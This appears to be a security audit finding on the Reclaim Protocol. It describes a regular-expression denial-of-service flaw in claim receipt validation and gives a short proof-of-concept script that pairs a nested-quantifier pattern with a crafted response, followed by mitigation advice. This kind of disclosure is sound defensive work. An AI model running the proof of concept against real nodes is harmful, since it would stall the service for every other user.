Reclaim Protocol assessment report, High findings
Category: Coding Mistakes

Node ReDoS in claim receipt validation

High Severity
High Impact
High Likelihood

Description

Reclaim nodes validate claim receipts by matching a user-supplied regular expression (RegEx) against the HTTP response fetched for the claim. The node places no limit on the execution time or the complexity of that RegEx, and the same user controls both the pattern and the website whose response the pattern is matched against. An attacker can therefore mount a ReDoS (regular-expression denial-of-service) attack by submitting a pattern with nested quantifiers, such as ([a-z]+)+$, together with a URL whose response almost matches it: the backtracking engine then tries an exponential number of ways to split the input before giving up.

To test this vulnerability, we can use the following:

import { createClaim } from '@reclaimprotocol/reclaim-node'

// Attacker-controlled claim request: both the pattern and the page it is
// matched against are chosen by the caller.
const claim = await createClaim({
  name: 'http',
  params: {
    url: 'https://...', // responds with aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
    method: 'GET',
    responseMatches: [{
      type: 'regex',
      // Nested quantifier: the trailing '!' in the body stops '$' from
      // matching, so the engine backtracks through every split of the
      // run of letters (roughly doubling the work per extra character).
      value: '([a-z]+)+$',
    }],
    responseRedactions: [],
  },
  secretParams: {
    cookieStr: 'a'
  },
  ownerPrivateKey: '0x...'
})

console.log(claim)

Impact

A single such request can keep the Reclaim node busy for an effectively unbounded time, since the backtracking grows exponentially with the length of the response the attacker serves. Because the match runs synchronously in the node process, the node stops servicing every other Reclaim user while it is stuck.

Recommendations

Reclaim should match user-supplied patterns with a RegEx engine that guarantees linear-time execution, such as RE2 (available to Node.js through the re2 package); RE2 gives up backreferences and lookaround in exchange for never backtracking catastrophically. If the native JavaScript engine must be kept, the node should at minimum cap the size of the response body it matches against, reject patterns containing nested quantifiers before compiling them, and run the match off the event loop with a hard timeout (for example in a worker thread that is terminated once its time budget is exceeded).

Remediation

Zellic © 2025